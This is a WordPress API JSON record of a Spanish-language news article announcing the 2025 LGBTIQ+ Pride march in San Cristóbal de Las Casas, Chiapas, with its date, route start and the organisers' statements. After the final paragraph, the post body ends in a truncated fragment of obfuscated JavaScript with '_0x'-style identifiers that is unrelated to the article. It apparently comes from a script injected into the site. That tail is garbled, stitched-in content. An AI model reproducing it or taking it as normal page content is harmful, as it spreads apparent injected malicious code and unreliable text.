{"id":22091,"date":"2025-05-27T03:42:55","date_gmt":"2025-05-27T03:42:55","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22091"},"modified":"2025-05-27T03:42:56","modified_gmt":"2025-05-27T03:42:56","slug":"anuncian-marcha-del-orgullo-y-la-digna-existencia-lgbtiq-2025","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22091","title":{"rendered":"Anuncian Marcha del Orgullo y la Digna Existencia LGBTIQ+ 2025"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"639\" height=\"297\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000138084.jpg\" alt=\"\" class=\"wp-image-22092\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000138084.jpg 639w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000138084-300x139.jpg 300w\" sizes=\"auto, (max-width: 639px) 100vw, 639px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodriguez\/ corresponsal<br>26 de mayo del 2025. San Crist\u00f3bal de Las Casas.- En un esfuerzo por reafirmar la visibilidad y los derechos de la comunidad LGBTIQ+, el Comit\u00e9 Organizador de la 16\u00aa Marcha de las Diversidades Sexo-Gen\u00e9ricas y Afectivas convoc\u00f3 a participar en la Marcha del Orgullo y la Digna Existencia LGBTIQ+ 2025, que se llevar\u00e1 a cabo el pr\u00f3ximo domingo 22 de junio.<\/p>\n\n\n\n<p>La concentraci\u00f3n dar\u00e1 inicio a las 10 de la ma\u00f1ana en la explanada de la Unidad Administrativa, punto desde el cual partir\u00e1 la movilizaci\u00f3n que recorrer\u00e1 las principales arterias de la ciudad. La jornada ser\u00e1 una expresi\u00f3n colectiva de protesta, resistencia y celebraci\u00f3n de las identidades diversas.<\/p>\n\n\n\n<p>Durante la presentaci\u00f3n del evento, las y los organizadores destacaron que la marcha no solo representa una festividad, sino tambi\u00e9n una denuncia frente a las persistentes formas de violencia, discriminaci\u00f3n y exclusi\u00f3n que viven las personas de la diversidad sexual y de g\u00e9nero en Chiapas y el resto del pa\u00eds.<\/p>\n\n\n\n<p>En este contexto, hicieron un llamado al Estado Mexicano para que garantice condiciones de vida dignas y libres de estigmas, prejuicios y agresiones para las poblaciones disidentes. \u201cLa marcha es un acto pol\u00edtico, de memoria y resistencia. Salimos por quienes nos antecedieron, por quienes hoy siguen luchando y por las nuevas generaciones que merecen crecer en libertad\u201d, se\u00f1alaron.<\/p>\n\n\n\n<p>El comit\u00e9 tambi\u00e9n reconoci\u00f3 la labor y compromiso de las colectivas, organizaciones civiles, espacios culturales y activistas independientes que participan en la organizaci\u00f3n, as\u00ed como en las m\u00faltiples actividades culturales, acad\u00e9micas y recreativas que se realizar\u00e1n durante junio como parte de esta conmemoraci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodriguez\/ corresponsal26 de mayo del 2025. San Crist\u00f3bal de Las Casas.- En un esfuerzo por reafirmar la visibilidad y los derechos de la comunidad LGBTIQ+, el Comit\u00e9 Organizador de la 16\u00aa Marcha de las Diversidades Sexo-Gen\u00e9ricas y Afectivas convoc\u00f3 a participar en la Marcha del Orgullo y la Digna Existencia LGBTIQ+ 2025, que se &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22092,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-22091","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22091","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22091"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22091\/revisions"}],"predecessor-version":[{"id":22093,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22091\/revisions\/22093"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22092"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22091"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22091"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22091"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}